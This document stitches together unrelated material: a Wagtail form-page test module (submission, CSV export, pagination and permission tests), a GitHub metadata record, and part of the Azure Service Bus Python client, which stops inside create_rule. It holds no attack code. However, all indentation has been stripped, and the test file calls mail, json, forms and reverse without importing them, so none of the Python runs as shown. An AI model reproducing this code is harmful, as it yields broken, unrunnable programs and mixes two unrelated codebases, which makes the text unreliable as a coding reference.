from django.test import TestCase
from wagtail.tests.testapp.models import FormField, FormPage, JadeFormPage
from wagtail.tests.utils import WagtailTestUtils
from wagtail.wagtailcore.models import Page
from wagtail.wagtailforms.forms import FormBuilder
from wagtail.wagtailforms.models import FormSubmission
def make_form_page(**kwargs):
kwargs.setdefault('title', "Contact us")
kwargs.setdefault('slug', "contact-us")
kwargs.setdefault('to_address', "to@email.com")
kwargs.setdefault('from_address', "from@email.com")
kwargs.setdefault('subject', "The subject")
home_page = Page.objects.get(url_path='/home/')
form_page = home_page.add_child(instance=FormPage(**kwargs))
FormField.objects.create(
page=form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
return form_page
class TestFormSubmission(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
def test_get_form(self):
response = self.client.get('/contact-us/')
# Check response
self.assertContains(response, """<label for="id_your-email">Your email</label>""")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
def test_post_invalid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob',
'your-message': 'hello world',
'your-choices': ''
})
# Check response
self.assertContains(response, "Enter a valid email address.")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].to, ['to@email.com'])
self.assertEqual(mail.outbox[0].from_email, 'from@email.com')
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
def test_post_unicode_characters(self):
self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'こんにちは、世界',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check the email
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your message: こんにちは、世界", mail.outbox[0].body)
# Check the form submission
submission = FormSubmission.objects.get()
submission_data = json.loads(submission.form_data)
self.assertEqual(submission_data['your-message'], 'こんにちは、世界')
def test_post_multiple_values(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': 'on', 'bar': 'on', 'baz': 'on'}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the three checkbox values were saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
submission = FormSubmission.objects.filter(
page=form_page, form_data__contains='hello world'
)
self.assertIn("foo", submission[0].form_data)
self.assertIn("bar", submission[0].form_data)
self.assertIn("baz", submission[0].form_data)
def test_post_blank_checkbox(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {},
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the checkbox was serialised in the email correctly
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your choices: None", mail.outbox[0].body)
class TestFormSubmissionWithMultipleRecipients(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page(to_address='to@email.com, another@email.com')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that one email was sent, but to two recipients
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].from_email, 'from@email.com')
self.assertEqual(set(mail.outbox[0].to), {'to@email.com', 'another@email.com'})
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
class TestFormBuilder(TestCase):
def setUp(self):
# Create a form page
home_page = Page.objects.get(url_path='/home/')
self.form_page = home_page.add_child(instance=FormPage(
title="Contact us",
slug="contact-us",
to_address="to@email.com",
from_address="from@email.com",
subject="The subject",
))
FormField.objects.create(
page=self.form_page,
sort_order=1,
label="Your name",
field_type='singleline',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your birthday",
field_type='date',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your birthtime :)",
field_type='datetime',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your homepage",
field_type='url',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite number",
field_type='number',
required=True,
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite Python IDEs",
field_type='dropdown',
required=True,
choices='PyCharm,vim,nano',
)
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Your favourite Python IDE",
help_text="Choose one",
field_type='radio',
required=True,
choices='PyCharm,vim,nano',
)
FormField.objects.create(
page=self.form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
FormField.objects.create(
page=self.form_page,
sort_order=3,
label="I agree to the Terms of Use",
field_type='checkbox',
required=True,
)
# Create a form builder
self.fb = FormBuilder(self.form_page.form_fields.all())
def test_fields(self):
"""
This tests that all fields were added to the form with the correct types
"""
form_class = self.fb.get_form_class()
# All fields are present in form
field_names = form_class.base_fields.keys()
self.assertIn('your-name', field_names)
self.assertIn('your-message', field_names)
self.assertIn('your-birthday', field_names)
self.assertIn('your-birthtime', field_names)
self.assertIn('your-email', field_names)
self.assertIn('your-homepage', field_names)
self.assertIn('your-favourite-number', field_names)
self.assertIn('your-favourite-python-ides', field_names)
self.assertIn('your-favourite-python-ide', field_names)
self.assertIn('your-choices', field_names)
self.assertIn('i-agree-to-the-terms-of-use', field_names)
# All fields have proper type
self.assertIsInstance(form_class.base_fields['your-name'], forms.CharField)
self.assertIsInstance(form_class.base_fields['your-message'], forms.CharField)
self.assertIsInstance(form_class.base_fields['your-birthday'], forms.DateField)
self.assertIsInstance(form_class.base_fields['your-birthtime'], forms.DateTimeField)
self.assertIsInstance(form_class.base_fields['your-email'], forms.EmailField)
self.assertIsInstance(form_class.base_fields['your-homepage'], forms.URLField)
self.assertIsInstance(form_class.base_fields['your-favourite-number'], forms.DecimalField)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ides'], forms.ChoiceField)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ide'], forms.ChoiceField)
self.assertIsInstance(form_class.base_fields['your-choices'], forms.MultipleChoiceField)
self.assertIsInstance(form_class.base_fields['i-agree-to-the-terms-of-use'], forms.BooleanField)
# Some fields have non-default widgets
self.assertIsInstance(form_class.base_fields['your-message'].widget, forms.Textarea)
self.assertIsInstance(form_class.base_fields['your-favourite-python-ide'].widget, forms.RadioSelect)
self.assertIsInstance(form_class.base_fields['your-choices'].widget, forms.CheckboxSelectMultiple)
class TestFormsIndex(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def make_form_pages(self):
"""
This makes 100 form pages and adds them as children to 'contact-us'
This is used to test pagination on the forms index
"""
for i in range(100):
self.form_page.add_child(instance=FormPage(
title="Form " + str(i),
slug='form-' + str(i),
live=True
))
def test_forms_index(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
def test_forms_index_pagination(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that we got the correct page
self.assertEqual(response.context['form_pages'].number, 2)
def test_forms_index_pagination_invalid(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 'Hello world!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got page one
self.assertEqual(response.context['form_pages'].number, 1)
def test_forms_index_pagination_out_of_range(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got the last page
self.assertEqual(response.context['form_pages'].number, response.context['form_pages'].paginator.num_pages)
def test_cannot_see_forms_without_permission(self):
# Login with as a user without permission to see forms
self.assertTrue(self.client.login(username='eventeditor', password='password'))
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user cannot see the form page
self.assertFalse(self.form_page in response.context['form_pages'])
def test_can_see_forms_with_permission(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user can see the form page
self.assertIn(self.form_page, response.context['form_pages'])
class TestFormsSubmissions(TestCase, WagtailTestUtils):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Add a couple of form submissions
old_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "old@example.com",
'your-message': "this is a really old message",
}),
)
old_form_submission.submit_time = '2013-01-01T12:00:00.000Z'
old_form_submission.save()
new_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "new@example.com",
'your-message': "this is a fairly new message",
}),
)
new_form_submission.submit_time = '2014-01-01T12:00:00.000Z'
new_form_submission.save()
# Login
self.login()
def make_list_submissions(self):
"""
This makes 100 submissions to test pagination on the forms submissions page
"""
for i in range(100):
submission = FormSubmission(
page=self.form_page,
form_data=json.dumps({
'hello': 'world'
})
)
submission.save()
def test_list_submissions(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 2)
def test_list_submissions_filtering_date_from(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_filtering_date_to(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_to': '12/31/2013'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_filtering_range(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '12/31/2013', 'date_to': '01/02/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_pagination(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the correct page
self.assertEqual(response.context['submissions'].number, 2)
def test_list_submissions_pagination_invalid(self):
self.make_list_submissions()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 'Hello World!'}
)
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got page one
self.assertEqual(response.context['submissions'].number, 1)
def test_list_submissions_pagination_out_of_range(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the last page
self.assertEqual(response.context['submissions'].number, response.context['submissions'].paginator.num_pages)
def test_list_submissions_csv_export(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2013-01-01 12:00:00+00:00,old@example.com,this is a really old message,None\r')
self.assertEqual(data_lines[2], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_date_from_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_from': '01/01/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_date_to_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_to': '12/31/2013'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2013-01-01 12:00:00+00:00,old@example.com,this is a really old message,None\r')
def test_list_submissions_csv_export_with_range_filtering(self):
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id,)),
{'action': 'CSV', 'date_from': '12/31/2013', 'date_to': '01/02/2014'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode().split("\n")
self.assertEqual(data_lines[0], 'Submission date,Your email,Your message,Your choices\r')
self.assertEqual(data_lines[1], '2014-01-01 12:00:00+00:00,new@example.com,this is a fairly new message,None\r')
def test_list_submissions_csv_export_with_unicode_in_submission(self):
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "unicode@example.com",
'your-message': 'こんにちは、世界',
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '01/02/2014', 'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode('utf-8').split("\n")[1]
self.assertIn('こんにちは、世界', data_line)
def test_list_submissions_csv_export_with_unicode_in_field(self):
FormField.objects.create(
page=self.form_page,
sort_order=2,
label="Выберите самую любимую IDE для разработке на Python",
help_text="Вы можете выбрать только один вариант",
field_type='radio',
required=True,
choices='PyCharm,vim,nano',
)
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "unicode@example.com",
'your-message': "We don\'t need unicode here",
'vyberite-samuiu-liubimuiu-ide-dlia-razrabotke-na-python': "vim",
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(
reverse('wagtailforms:list_submissions', args=(self.form_page.id, )),
{'date_from': '01/02/2014', 'action': 'CSV'}
)
# Check response
self.assertEqual(response.status_code, 200)
data_lines = response.content.decode('utf-8').split("\n")
self.assertIn('Выберите самую любимую IDE для разработке на Python', data_lines[0])
self.assertIn('vim', data_lines[1])
class TestDeleteFormSubmission(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def test_delete_submission_show_cofirmation(self):
response = self.client.get(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check show confirm page when HTTP method is GET
self.assertTemplateUsed(response, 'wagtailforms/confirm_delete.html')
# Check that the deletion has not happened with GET request
self.assertEqual(FormSubmission.objects.count(), 2)
def test_delete_submission_with_permissions(self):
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the submission is gone
self.assertEqual(FormSubmission.objects.count(), 1)
# Should be redirected to list of submissions
self.assertRedirects(response, reverse("wagtailforms:list_submissions", args=(self.form_page.id, )))
def test_delete_submission_bad_permissions(self):
self.assertTrue(self.client.login(username="eventeditor", password="password"))
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the user recieved a 403 response
self.assertEqual(response.status_code, 403)
# Check that the deletion has not happened
self.assertEqual(FormSubmission.objects.count(), 2)
class TestIssue798(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='siteeditor', password='password'))
self.form_page = Page.objects.get(url_path='/home/contact-us/').specific
# Add a number field to the page
FormField.objects.create(
page=self.form_page,
label="Your favourite number",
field_type='number',
)
def test_post(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob@example.com',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''},
'your-favourite-number': '7.3',
})
# Check response
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that form submission was saved correctly
self.assertTrue(FormSubmission.objects.filter(page=self.form_page, form_data__contains='7.3').exists())
class TestIssue585(TestCase):
fixtures = ['test.json']
def setUp(self):
self.assertTrue(self.client.login(username='superuser', password='password'))
# Find root page
self.root_page = Page.objects.get(id=2)
def test_adding_duplicate_form_labels(self):
post_data = {
'title': "Form page!",
'content': "Some content",
'slug': 'contact-us',
'form_fields-TOTAL_FORMS': '3',
'form_fields-INITIAL_FORMS': '3',
'form_fields-MIN_NUM_FORMS': '0',
'form_fields-MAX_NUM_FORMS': '1000',
'form_fields-0-id': '',
'form_fields-0-label': 'foo',
'form_fields-0-field_type': 'singleline',
'form_fields-1-id': '',
'form_fields-1-label': 'foo',
'form_fields-1-field_type': 'singleline',
'form_fields-2-id': '',
'form_fields-2-label': 'bar',
'form_fields-2-field_type': 'singleline',
}
response = self.client.post(
reverse('wagtailadmin_pages:add', args=('tests', 'formpage', self.root_page.id)), post_data
)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
text="There is another field with the label foo, please change one of them.",
)
class TestNonHtmlExtension(TestCase):
fixtures = ['test.json']
def test_non_html_extension(self):
form_page = JadeFormPage(title="test")
self.assertEqual(form_page.landing_page_template, "tests/form_page_landing.jade")
|
{
"content_hash": "100ee126a8d0ded3daf40e2e2e096186",
"timestamp": "",
"source": "github",
"line_count": 760,
"max_line_length": 120,
"avg_line_length": 38.71184210526316,
"alnum_prop": 0.6175520886441658,
"repo_name": "kurtrwall/wagtail",
"id": "962f071967588f1f9d736732077e882808f1dac1",
"size": "29627",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "wagtail/wagtailforms/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "175780"
},
{
"name": "HTML",
"bytes": "300701"
},
{
"name": "JavaScript",
"bytes": "122930"
},
{
"name": "Makefile",
"bytes": "685"
},
{
"name": "Python",
"bytes": "2527012"
},
{
"name": "Shell",
"bytes": "7240"
}
],
"symlink_target": ""
}
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import datetime
import os
import time
import json
import requests
from azure.common import (
AzureHttpError,
)
from .constants import (
AZURE_SERVICEBUS_NAMESPACE,
AZURE_SERVICEBUS_ACCESS_KEY,
AZURE_SERVICEBUS_ISSUER,
DEFAULT_HTTP_TIMEOUT,
SERVICE_BUS_HOST_BASE,
_USER_AGENT_STRING,
)
from ._common_error import (
_dont_fail_not_exist,
_dont_fail_on_exist,
_validate_not_none,
)
from ._common_models import (
_unicode_type,
)
from ._common_conversion import (
_encode_base64,
_int_or_none,
_sign_string,
_str,
)
from ._common_serialization import (
_ETreeXmlToObject,
_get_request_body,
url_quote,
url_unquote,
)
from ._http import (
HTTPError,
HTTPRequest,
)
from ._http.httpclient import _HTTPClient
from ._serialization import (
_convert_event_hub_to_xml,
_convert_topic_to_xml,
_convert_response_to_topic,
_convert_queue_to_xml,
_convert_response_to_queue,
_convert_subscription_to_xml,
_convert_response_to_subscription,
_convert_rule_to_xml,
_convert_response_to_rule,
_convert_response_to_event_hub,
_convert_etree_element_to_queue,
_convert_etree_element_to_topic,
_convert_etree_element_to_subscription,
_convert_etree_element_to_rule,
_create_message,
_service_bus_error_handler,
)
class ServiceBusService(object):
def __init__(self, service_namespace=None, account_key=None, issuer=None,
x_ms_version='2011-06-01', host_base=SERVICE_BUS_HOST_BASE,
shared_access_key_name=None, shared_access_key_value=None,
authentication=None, timeout=DEFAULT_HTTP_TIMEOUT,
request_session=None):
'''
Initializes the service bus service for a namespace with the specified
authentication settings (SAS or ACS).
service_namespace:
Service bus namespace, required for all operations. If None,
the value is set to the AZURE_SERVICEBUS_NAMESPACE env variable.
account_key:
ACS authentication account key. If None, the value is set to the
AZURE_SERVICEBUS_ACCESS_KEY env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
issuer:
ACS authentication issuer. If None, the value is set to the
AZURE_SERVICEBUS_ISSUER env variable.
Note that if both SAS and ACS settings are specified, SAS is used.
x_ms_version:
Unused. Kept for backwards compatibility.
host_base:
Optional. Live host base url. Defaults to Azure url. Override this
for on-premise.
shared_access_key_name:
SAS authentication key name.
Note that if both SAS and ACS settings are specified, SAS is used.
shared_access_key_value:
SAS authentication key value.
Note that if both SAS and ACS settings are specified, SAS is used.
authentication:
Instance of authentication class. If this is specified, then
ACS and SAS parameters are ignored.
timeout:
Optional. Timeout for the http request, in seconds.
request_session:
Optional. Session object to use for http requests.
'''
self.requestid = None
self.service_namespace = service_namespace
self.host_base = host_base
if not self.service_namespace:
self.service_namespace = os.environ.get(AZURE_SERVICEBUS_NAMESPACE)
if not self.service_namespace:
raise ValueError('You need to provide servicebus namespace')
if authentication:
self.authentication = authentication
else:
if not account_key:
account_key = os.environ.get(AZURE_SERVICEBUS_ACCESS_KEY)
if not issuer:
issuer = os.environ.get(AZURE_SERVICEBUS_ISSUER)
if shared_access_key_name and shared_access_key_value:
self.authentication = ServiceBusSASAuthentication(
shared_access_key_name,
shared_access_key_value)
elif account_key and issuer:
self.authentication = ServiceBusWrapTokenAuthentication(
account_key,
issuer)
else:
raise ValueError(
'You need to provide servicebus access key and Issuer OR shared access key and value')
self._httpclient = _HTTPClient(
service_instance=self,
timeout=timeout,
request_session=request_session or requests.Session(),
user_agent=_USER_AGENT_STRING,
)
self._filter = self._httpclient.perform_request
@staticmethod
def format_dead_letter_queue_name(queue_name):
"""Get the dead letter name of this queue"""
return queue_name + '/$DeadLetterQueue'
@staticmethod
def format_dead_letter_subscription_name(subscription_name):
"""Get the dead letter name of this subscription"""
return subscription_name + '/$DeadLetterQueue'
# Backwards compatibility:
# account_key and issuer used to be stored on the service class, they are
# now stored on the authentication class.
@property
def account_key(self):
return self.authentication.account_key
@account_key.setter
def account_key(self, value):
self.authentication.account_key = value
@property
def issuer(self):
return self.authentication.issuer
@issuer.setter
def issuer(self, value):
self.authentication.issuer = value
def with_filter(self, filter):
'''
Returns a new service which will process requests with the specified
filter. Filtering operations can include logging, automatic retrying,
etc... The filter is a lambda which receives the HTTPRequest and
another lambda. The filter can perform any pre-processing on the
request, pass it off to the next lambda, and then perform any
post-processing on the response.
'''
res = ServiceBusService(
service_namespace=self.service_namespace,
authentication=self.authentication)
old_filter = self._filter
def new_filter(request):
return filter(request, old_filter)
res._filter = new_filter
return res
def set_proxy(self, host, port, user=None, password=None):
'''
Sets the proxy server host and port for the HTTP CONNECT Tunnelling.
host:
Address of the proxy. Ex: '192.168.0.100'
port:
Port of the proxy. Ex: 6000
user:
User for proxy authorization.
password:
Password for proxy authorization.
'''
self._httpclient.set_proxy(host, port, user, password)
@property
def timeout(self):
return self._httpclient.timeout
@timeout.setter
def timeout(self, value):
self._httpclient.timeout = value
def create_queue(self, queue_name, queue=None, fail_on_exist=False):
'''
Creates a new queue. Once created, this queue's resource manifest is
immutable.
queue_name:
Name of the queue to create.
queue:
Queue object to create.
fail_on_exist:
Specify whether to throw an exception when the queue exists.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.body = _get_request_body(_convert_queue_to_xml(queue))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_queue(self, queue_name, fail_not_exist=False):
'''
Deletes an existing queue. This operation will also remove all
associated state including messages in the queue.
queue_name:
Name of the queue to delete.
fail_not_exist:
Specify whether to throw an exception if the queue doesn't exist.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_queue(self, queue_name):
'''
Retrieves an existing queue.
queue_name:
Name of the queue.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_queue(response)
def list_queues(self):
'''
Enumerates the queues in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Queues'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_queue)
def create_topic(self, topic_name, topic=None, fail_on_exist=False):
'''
Creates a new topic. Once created, this topic resource manifest is
immutable.
topic_name:
Name of the topic to create.
topic:
Topic object to create.
fail_on_exist:
Specify whether to throw an exception when the topic exists.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.body = _get_request_body(_convert_topic_to_xml(topic))
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_topic(self, topic_name, fail_not_exist=False):
'''
Deletes an existing topic. This operation will also remove all
associated state including associated subscriptions.
topic_name:
Name of the topic to delete.
fail_not_exist:
Specify whether throw exception when topic doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_topic(self, topic_name):
'''
Retrieves the description for the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_topic(response)
def list_topics(self):
'''
Retrieves the topics in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Topics'
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_topic)
def create_rule(self, topic_name, subscription_name, rule_name, rule=None,
fail_on_exist=False):
'''
